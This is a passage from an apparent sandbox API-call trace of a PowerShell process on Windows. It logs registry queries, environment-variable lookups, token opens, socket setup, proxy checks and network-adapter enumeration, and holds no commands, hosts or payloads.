lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508de78, lpData=0x0, lpcbData=0xafa508de70*=0x0 | out: lpType=0xafa508de78*=0x1, lpData=0x0, lpcbData=0xafa508de70*=0x56) returned 0x0 [0162.410] RegQueryValueExW (in: hKey=0x6d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508de78, lpData=0x2380085bd78, lpcbData=0xafa508de70*=0x56 | out: lpType=0xafa508de78*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xafa508de70*=0x56) returned 0x0 [0162.410] RegCloseKey (hKey=0x6d4) returned 0x0 [0162.410] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508de28 | out: phkResult=0xafa508de28*=0x6d4) returned 0x0 [0162.411] RegQueryValueExW (in: hKey=0x6d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508de78, lpData=0x0, lpcbData=0xafa508de70*=0x0 | out: lpType=0xafa508de78*=0x1, lpData=0x0, lpcbData=0xafa508de70*=0x56) returned 0x0 [0162.411] RegQueryValueExW (in: hKey=0x6d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508de78, lpData=0x2380085c0f8, lpcbData=0xafa508de70*=0x56 | out: lpType=0xafa508de78*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xafa508de70*=0x56) returned 0x0 [0162.411] RegCloseKey (hKey=0x6d4) returned 0x0 [0162.411] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508de28 | out: phkResult=0xafa508de28*=0x6d4) returned 0x0 [0162.411] RegQueryValueExW (in: hKey=0x6d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508de78, lpData=0x0, lpcbData=0xafa508de70*=0x0 | out: lpType=0xafa508de78*=0x1, lpData=0x0, lpcbData=0xafa508de70*=0x56) returned 0x0 [0162.411] RegQueryValueExW (in: hKey=0x6d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508de78, lpData=0x2380085c490, lpcbData=0xafa508de70*=0x56 | out: lpType=0xafa508de78*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xafa508de70*=0x56) returned 0x0 [0162.411] RegCloseKey (hKey=0x6d4) returned 0x0 [0162.412] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508de28 | out: phkResult=0xafa508de28*=0x6d4) returned 0x0 [0162.412] RegQueryValueExW (in: hKey=0x6d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508de78, lpData=0x0, lpcbData=0xafa508de70*=0x0 | out: lpType=0xafa508de78*=0x1, lpData=0x0, lpcbData=0xafa508de70*=0x56) returned 0x0 [0162.412] RegQueryValueExW (in: hKey=0x6d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508de78, lpData=0x2380085c838, lpcbData=0xafa508de70*=0x56 | out: lpType=0xafa508de78*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xafa508de70*=0x56) returned 0x0 [0162.412] RegCloseKey (hKey=0x6d4) returned 0x0 [0162.412] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508de28 | out: phkResult=0xafa508de28*=0x6d4) returned 0x0 [0162.412] RegQueryValueExW (in: hKey=0x6d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508de78, lpData=0x0, lpcbData=0xafa508de70*=0x0 | out: lpType=0xafa508de78*=0x1, lpData=0x0, lpcbData=0xafa508de70*=0x56) returned 0x0 [0162.412] RegQueryValueExW (in: hKey=0x6d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508de78, lpData=0x2380085cbe0, lpcbData=0xafa508de70*=0x56 | out: lpType=0xafa508de78*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xafa508de70*=0x56) returned 0x0 [0162.412] RegCloseKey (hKey=0x6d4) returned 0x0 [0162.413] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508de28 | out: phkResult=0xafa508de28*=0x6d4) returned 0x0 [0162.413] RegQueryValueExW (in: hKey=0x6d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508de78, lpData=0x0, lpcbData=0xafa508de70*=0x0 | out: lpType=0xafa508de78*=0x1, lpData=0x0, lpcbData=0xafa508de70*=0x56) returned 0x0 [0162.413] RegQueryValueExW (in: hKey=0x6d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508de78, lpData=0x2380085cf60, lpcbData=0xafa508de70*=0x56 | out: lpType=0xafa508de78*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xafa508de70*=0x56) returned 0x0 [0162.413] RegCloseKey (hKey=0x6d4) returned 0x0 [0162.413] EtwEventActivityIdControl () returned 0x0 [0162.413] EtwEventActivityIdControl () returned 0x0 [0162.414] SetEvent (hEvent=0x694) returned 1 [0162.414] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xafa508e230*=0x694, lpdwindex=0xafa508e004 | out: lpdwindex=0xafa508e004) returned 0x0 [0162.420] CoTaskMemAlloc (cb=0x20e) returned 0x2386d704dc0 [0162.420] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2386d704dc0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0162.420] CoTaskMemFree (pv=0x2386d704dc0) [0162.423] GetStdHandle (nStdHandle=0xfffffff4) returned 0x28 [0162.423] GetFileType (hFile=0x28) returned 0x2 [0162.426] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e518 | out: lpConsoleScreenBufferInfo=0xafa508e518) returned 1 [0162.427] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e518 | out: lpConsoleScreenBufferInfo=0xafa508e518) returned 1 [0162.490] EtwEventActivityIdControl () returned 0x0 [0162.490] EtwEventActivityIdControl () returned 0x0 [0162.490] EtwEventActivityIdControl () returned 0x0 [0162.558] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6d4 [0162.558] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x1388, cHandles=0x1, pHandles=0xafa508e690*=0x6d4, lpdwindex=0xafa508e464 | out: lpdwindex=0xafa508e464) returned 0x80010115 [0167.645] EtwEventActivityIdControl () returned 0x0 [0167.667] CloseHandle (hObject=0x6d4) returned 1 [0168.146] CoTaskMemAlloc (cb=0x20e) returned 0x2386d704100 [0168.146] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x2386d704100, nSize=0x105 | out: lpBuffer="") returned 0x24 [0168.146] CoTaskMemFree (pv=0x2386d704100) [0168.147] CoTaskMemAlloc (cb=0x20e) returned 0x2386d707a60 [0168.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2386d707a60, nSize=0x105 | out: lpBuffer="") returned 0x0 [0168.147] CoTaskMemFree (pv=0x2386d707a60) [0168.150] CoTaskMemAlloc (cb=0x20e) returned 0x2386d706fc0 [0168.150] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x2386d706fc0, nSize=0x105 | out: lpBuffer="") returned 0x24 [0168.150] CoTaskMemFree (pv=0x2386d706fc0) [0168.278] CoTaskMemAlloc (cb=0x20e) returned 0x2386d702120 [0168.278] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2386d702120, nSize=0x105 | out: lpBuffer="") returned 0x0 [0168.279] CoTaskMemFree (pv=0x2386d702120) [0168.346] EtwEventActivityIdControl () returned 0x0 [0168.346] EtwEventActivityIdControl () returned 0x0 [0168.346] EtwEventActivityIdControl () returned 0x0 [0168.584] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0xafa508e3a8 | out: pFixedInfo=0x0, pOutBufLen=0xafa508e3a8) returned 0x6f [0168.651] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x2386d5e5850 [0168.651] GetNetworkParams (in: pFixedInfo=0x2386d5e5850, pOutBufLen=0xafa508e3a8 | out: pFixedInfo=0x2386d5e5850, pOutBufLen=0xafa508e3a8) returned 0x0 [0168.664] LocalFree (hMem=0x2386d5e5850) returned 0x0 [0168.682] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6f4 [0168.682] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6fc [0168.714] GetCurrentProcess () returned 0xffffffffffffffff [0168.714] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508dd38 | out: TokenHandle=0xafa508dd38*=0x714) returned 1 [0168.720] GetCurrentProcess () returned 0xffffffffffffffff [0168.720] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508dd48 | out: TokenHandle=0xafa508dd48*=0x710) returned 1 [0168.732] QueryPerformanceFrequency (in: lpFrequency=0x7ff7f5554ff8 | out: lpFrequency=0x7ff7f5554ff8*=100000000) returned 1 [0168.732] QueryPerformanceCounter (in: lpPerformanceCount=0xafa508e3f8 | out: lpPerformanceCount=0xafa508e3f8*=3482971263375) returned 1 [0168.743] GetCurrentProcess () returned 0xffffffffffffffff [0168.743] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508dc38 | out: TokenHandle=0xafa508dc38*=0x718) returned 1 [0168.747] GetCurrentProcess () returned 0xffffffffffffffff [0168.747] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508dc48 | out: TokenHandle=0xafa508dc48*=0x71c) returned 1 [0168.768] GetCurrentProcess () returned 0xffffffffffffffff [0168.768] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508dca8 | out: TokenHandle=0xafa508dca8*=0x720) returned 1 [0168.770] GetCurrentProcess () returned 0xffffffffffffffff [0168.770] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508dcb8 | out: TokenHandle=0xafa508dcb8*=0x724) returned 1 [0168.780] GetCurrentProcess () returned 0xffffffffffffffff [0168.780] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508e1b8 | out: TokenHandle=0xafa508e1b8*=0x728) returned 1 [0168.796] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508c198 | out: phkResult=0xafa508c198*=0x72c) returned 0x0 [0168.796] RegQueryValueExW (in: hKey=0x72c, lpValueName="InstallationType", lpReserved=0x0, lpType=0xafa508c1e8, lpData=0x0, lpcbData=0xafa508c1e0*=0x0 | out: lpType=0xafa508c1e8*=0x1, lpData=0x0, lpcbData=0xafa508c1e0*=0xe) returned 0x0 [0168.796] RegQueryValueExW (in: hKey=0x72c, lpValueName="InstallationType", lpReserved=0x0, lpType=0xafa508c1e8, lpData=0x238008f9540, lpcbData=0xafa508c1e0*=0xe | out: lpType=0xafa508c1e8*=0x1, lpData="Client", lpcbData=0xafa508c1e0*=0xe) returned 0x0 [0168.797] RegCloseKey (hKey=0x72c) returned 0x0 [0168.856] CoTaskMemAlloc (cb=0xcd0) returned 0x2386d71f7a0 [0168.857] RasEnumConnectionsW (in: param_1=0x2386d71f7a0, param_2=0xafa508e160, param_3=0xafa508e168 | out: param_1=0x2386d71f7a0, param_2=0xafa508e160, param_3=0xafa508e168) returned 0x0 [0168.876] CoTaskMemFree (pv=0x2386d71f7a0) [0168.882] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xafa508dea8 | out: lpWSAData=0xafa508dea8) returned 0 [0168.889] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x774 [0168.995] setsockopt (s=0x774, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0168.995] closesocket (s=0x774) returned 0 [0168.995] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x774 [0168.996] setsockopt (s=0x774, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0168.996] closesocket (s=0x774) returned 0 [0168.997] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x774 [0168.997] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x778 [0169.000] ioctlsocket (in: s=0x774, cmd=-2147195266, argp=0xafa508e188 | out: argp=0xafa508e188) returned 0 [0169.001] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x77c [0169.001] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x780 [0169.001] ioctlsocket (in: s=0x77c, cmd=-2147195266, argp=0xafa508e188 | out: argp=0xafa508e188) returned 0 [0169.002] WSAIoctl (in: s=0x774, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0xafa508e110, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0xafa508e110, lpOverlapped=0x0) returned -1 [0169.003] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0xafa508dcf0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0169.010] WSAEventSelect (s=0x774, hEventObject=0x778, lNetworkEvents=512) returned 0 [0169.010] WSAIoctl (in: s=0x77c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0xafa508e110, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0xafa508e110, lpOverlapped=0x0) returned -1 [0169.010] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0xafa508dcf0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0169.010] WSAEventSelect (s=0x77c, hEventObject=0x780, lNetworkEvents=512) returned 0 [0169.010] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x788 [0169.011] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x788, param_3=0x3) returned 0x0 [0169.020] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xafa508e1f8 | out: phkResult=0xafa508e1f8*=0x7a0) returned 0x0 [0169.021] RegOpenKeyExW (in: hKey=0x7a0, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508e138 | out: phkResult=0xafa508e138*=0x7a4) returned 0x0 [0169.021] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7a8 [0169.021] RegNotifyChangeKeyValue (hKey=0x7a4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x7a8, fAsynchronous=1) returned 0x0 [0169.023] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508e140 | out: phkResult=0xafa508e140*=0x7ac) returned 0x0 [0169.023] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7b0 [0169.023] RegNotifyChangeKeyValue (hKey=0x7ac, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x7b0, fAsynchronous=1) returned 0x0 [0169.023] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508e140 | out: phkResult=0xafa508e140*=0x7b4) returned 0x0 [0169.023] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7b8 [0169.023] RegNotifyChangeKeyValue (hKey=0x7b4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x7b8, fAsynchronous=1) returned 0x0 [0169.024] GetCurrentProcess () returned 0xffffffffffffffff [0169.024] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508e0c8 | out: TokenHandle=0xafa508e0c8*=0x7bc) returned 1 [0169.028] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508d1f8 | out: phkResult=0xafa508d1f8*=0x7c0) returned 0x0 [0169.031] RegQueryValueExW (in: hKey=0x7c0, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0xafa508d238, lpData=0x0, lpcbData=0xafa508d230*=0x0 | out: lpType=0xafa508d238*=0x0, lpData=0x0, lpcbData=0xafa508d230*=0x0) returned 0x2 [0169.031] RegCloseKey (hKey=0x7c0) returned 0x0 [0169.053] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2386d707c80 [0169.067] WinHttpSetTimeouts (hInternet=0x2386d707c80, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0169.068] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xafa508e140 | out: pProxyConfig=0xafa508e140) returned 1 [0169.090] CoTaskMemAlloc (cb=0x20e) returned 0x2386d707ea0 [0169.090] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x2386d707ea0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0169.091] CoTaskMemFree (pv=0x2386d707ea0) [0169.091] CoTaskMemAlloc (cb=0x20e) returned 0x2386d703ee0 [0169.091] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x2386d703ee0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0169.091] CoTaskMemFree (pv=0x2386d703ee0) [0169.097] EtwEventRegister () returned 0x0 [0169.098] EtwEventSetInformation () returned 0x0 [0169.107] GetCurrentProcess () returned 0xffffffffffffffff [0169.107] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508dc08 | out: TokenHandle=0xafa508dc08*=0x7f8) returned 1 [0169.111] GetCurrentProcess () returned 0xffffffffffffffff [0169.111] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508dc18 | out: TokenHandle=0xafa508dc18*=0x7fc) returned 1 [0169.140] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x804 [0169.153] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xafa508df50*=0x788, lpdwindex=0xafa508dd24 | out: lpdwindex=0xafa508dd24) returned 0x80010115 [0169.153] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xafa508df00*=0x778, lpdwindex=0xafa508dcd4 | out: lpdwindex=0xafa508dcd4) returned 0x80010115 [0169.154] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xafa508df00*=0x780, lpdwindex=0xafa508dcd4 | out: lpdwindex=0xafa508dcd4) returned 0x80010115 [0169.154] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xafa508dfd0*=0x7a8, lpdwindex=0xafa508dda4 | out: lpdwindex=0xafa508dda4) returned 0x80010115 [0169.154] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xafa508dfd0*=0x7b0, lpdwindex=0xafa508dda4 | out: lpdwindex=0xafa508dda4) returned 0x80010115 [0169.155] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xafa508dfd0*=0x7b8, lpdwindex=0xafa508dda4 | out: lpdwindex=0xafa508dda4) returned 0x80010115 [0169.167] GetCurrentProcess () returned 0xffffffffffffffff [0169.167] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508db68 | out: TokenHandle=0xafa508db68*=0x808) returned 1 [0169.169] GetCurrentProcess () returned 0xffffffffffffffff [0169.169] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508db78 | out: TokenHandle=0xafa508db78*=0x80c) returned 1 [0169.171] SetEvent (hEvent=0x6f4) returned 1 [0169.201] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x824 [0169.201] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x828 [0169.201] ioctlsocket (in: s=0x824, cmd=-2147195266, argp=0xafa508e218 | out: argp=0xafa508e218) returned 0 [0169.201] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x82c [0169.202] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x830 [0169.202] ioctlsocket (in: s=0x82c, cmd=-2147195266, argp=0xafa508e218 | out: argp=0xafa508e218) returned 0 [0169.202] WSAIoctl (in: s=0x824, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0xafa508e1a0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0xafa508e1a0, lpOverlapped=0x0) returned -1 [0169.202] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0xafa508dd80, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0169.202] WSAEventSelect (s=0x824, hEventObject=0x828, lNetworkEvents=512) returned 0 [0169.202] WSAIoctl (in: s=0x82c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0xafa508e1a0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0xafa508e1a0, lpOverlapped=0x0) returned -1 [0169.202] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0xafa508dd80, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0169.202] WSAEventSelect (s=0x82c, hEventObject=0x830, lNetworkEvents=512) returned 0 [0169.203] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0xafa508e208*=0x0 | out: AdapterAddresses=0x0, SizePointer=0xafa508e208*=0xc28) returned 0x6f [0169.206] LocalAlloc (uFlags=0x0, uBytes=0xc28) returned 0x2386d73a5a0 [0169.206] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x2386d73a5a0, SizePointer=0xafa508e208*=0xc28 | out: AdapterAddresses=0x2386d73a5a0*(Alignment=0x6000001c0, Length=0x1c0, IfIndex=0x6, Next=0x2386d73a8c0, AdapterName="{E96D977E-F067-4CE9-924D-F6E0A04729E4}", FirstUnicastAddress=0x2386d73a810, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #2", FriendlyName="Ethernet 2", PhysicalAddress=([0]=0x0, [1]=0x20, [2]=0x57, [3]=0xc8, [4]=0x18, [5]=0x9d, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x6, ZoneIndices=([0]=0x6, [1]=0x6, [2]=0x6, [3]=0x6, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008002000000, Dhcpv4Server.lpSockaddr=0x2386d73a760*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x28, [7]=0x5e, [8]=0x0, [9]=0xf, [10]=0xf3, [11]=0xe1, [12]=0x61, [13]=0x38, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x6000ff3, FirstDnsSuffix=0x0), SizePointer=0xafa508e208*=0xc28) returned 0x0 [0169.220] LocalFree (hMem=0x2386d73a5a0) returned 0x0 [0169.231] CoTaskMemAlloc (cb=0x20e) returned 0x2386d701ce0 [0169.231] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x2386d701ce0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0169.231] CoTaskMemFree (pv=0x2386d701ce0) [0169.231] CoTaskMemAlloc (cb=0x20e) returned 0x2386d704320 [0169.231] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x2386d704320, nSize=0x105 | out: lpBuffer="") returned 0x0 [0169.231] CoTaskMemFree (pv=0x2386d704320) [0169.252] 